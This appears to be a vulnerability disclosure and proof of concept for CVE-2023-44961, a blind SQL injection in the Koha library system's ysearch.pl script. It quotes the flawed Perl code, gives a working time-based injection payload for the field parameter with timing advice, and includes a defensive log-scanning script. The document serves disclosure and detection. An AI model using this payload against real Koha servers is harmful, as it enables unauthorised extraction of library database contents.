CVE-2023-44961

PoC for CVE-2023-44961

Description

This is a SQL injection vulnerability in Koha Library Software v23.0.5.04 and earlier that allows a remote attacker to obtain arbitrary data from the Koha SQL server.

Analysis

This vulnerability is located in the intranet/cgi-bin/cataloguing/ysearch.pl file of the intranet (staff) interface:

...
my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');

# Prevent from disclosing data
die() unless ($table eq "biblioitems");

...

my $dbh = C4::Context->dbh;
# $field (and $table) are interpolated straight into the SQL text;
# only the three LIKE values are passed as bound parameters
my $sql = qq(SELECT distinct $field
             FROM $table
             WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
$sth->execute("$query%", "% $query%", "%-$query%");
...

When the SQL statement is built in the $sql variable, $table and $field are interpolated into the query text without any keyword filtering or validation; only the LIKE values are bound as placeholders. $table is compared against the literal "biblioitems", but $field is never checked, so time-based blind SQL injection can be achieved by injecting the following payload:

$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))

The sql command after concatenation is:

SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) FROM biblioitems WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))

Since SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ? returns the $field value of every row in $table that satisfies one of the three LIKE conditions, the injected expression is evaluated once per row as the query traverses $table.

Therefore, to keep the total delay down, set the sleep argument to 1/n, where n is the number of rows in $table, i.e. sleep(1/n).
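A defensive counterpart to the analysis above, added here as an example and not part of the original PoC: it scans web-server access-log lines for ysearch.pl requests whose table or field parameter is anything other than a bare SQL identifier, which is exactly the shape of the payload shown. The log lines, the REQUEST_RE log format and the identifier rule are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
# The second line carries the field= payload discussed in the analysis.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2023:10:00:01 +0000] "GET /cgi-bin/koha/cataloguing/ysearch.pl?term=abc&table=biblioitems&field=publishercode HTTP/1.1" 200 512
10.0.0.9 - - [01/Oct/2023:10:00:02 +0000] "GET /cgi-bin/koha/cataloguing/ysearch.pl?term=&table=biblioitems&field=1+and+if((substr(database(),1,1)='k'),sleep(1),sleep(0)) HTTP/1.1" 200 37
10.0.0.5 - - [01/Oct/2023:10:00:03 +0000] "GET /cgi-bin/koha/mainpage.pl HTTP/1.1" 200 9000
"""

# client IP, then the quoted request line: METHOD TARGET HTTP/x.y (assumed format)
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# a legitimate table or column name is a bare identifier, nothing else
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

def is_bare_identifier(value):
    return IDENT_RE.fullmatch(value) is not None

def inspect_request(target):
    """Return reasons a ysearch.pl request looks like injection; [] if clean or not ysearch.pl."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cataloguing/ysearch.pl"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for name in ("table", "field"):
        for value in params.get(name, []):
            if not is_bare_identifier(value):
                reasons.append(f"{name} is not a bare identifier: {value!r}")
    # the script only dies for table != biblioitems; any other value is still worth logging
    for value in params.get("table", []):
        if value != "biblioitems":
            reasons.append(f"unexpected table: {value!r}")
    return reasons

def find_suspicious(log_text):
    """Scan log lines and return [(client_ip, target, reasons), ...] for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits
```

Running find_suspicious(SAMPLE_LOG) flags only the second line, because its field value contains spaces, parentheses and quotes rather than a column name.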

PoC

To trigger the SQL injection, first make sure the biblioitems table contains data. Data can be added through the following URL:

http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/addbiblio.pl

I have added one record here:

Testing our SQL statement on the command line:

It can be seen that with one row in the biblioitems table and the sleep set to 1 second, the actual delay is 3 seconds.

Following this approach, a PoC can be constructed for testing:

Access the following URL to trigger it:

http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/ysearch.pl

As shown in the figure, my database name is koha_mykoha.